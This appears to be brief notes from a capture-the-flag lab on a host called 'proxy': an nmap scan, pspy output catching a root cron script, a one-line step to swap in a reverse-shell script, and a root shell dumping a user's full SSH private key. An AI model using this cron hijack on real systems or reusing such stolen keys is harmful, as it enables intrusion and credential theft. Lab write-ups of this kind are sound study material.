```rust
 nmap 192.168.1.11 -sCV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-10 22:18 EDT
Nmap scan report for 192.168.1.11
Host is up (0.034s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 14:1f:90:7b:b8:44:18:fa:55:5d:36:87:0f:00:92:07 (RSA)
|   256 f4:2e:64:25:a7:28:74:00:f8:bb:33:10:ec:5e:3d:50 (ECDSA)
|_  256 f5:2e:20:6c:76:f4:3e:31:83:b5:c2:41:f4:89:22:4c (ED25519)
80/tcp   open  http       nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: 403 Forbidden
3128/tcp open  http-proxy Squid http proxy 4.13
|_http-server-header: squid/4.13
|_http-title: ERROR: The requested URL could not be retrieved
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.89 seconds
```

Run pspy and catch the cron job running
```rust
2024/10/11 03:52:01 CMD: UID=0     PID=23423  |
2024/10/11 03:52:01 CMD: UID=0     PID=23424  | /bin/bash /opt/scripts/checkproxy.sh
2024/10/11 03:52:11 CMD: UID=0     PID=23427  |
```

copy and move the script and add a new script to generate a reverse shell

```
root@proxy:/home/jennifer/.ssh# cat id_rsa
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
6hgTymJJVX4yvS3KznXBfNvlgU8=
-----END OPENSSH PRIVATE KEY-----
```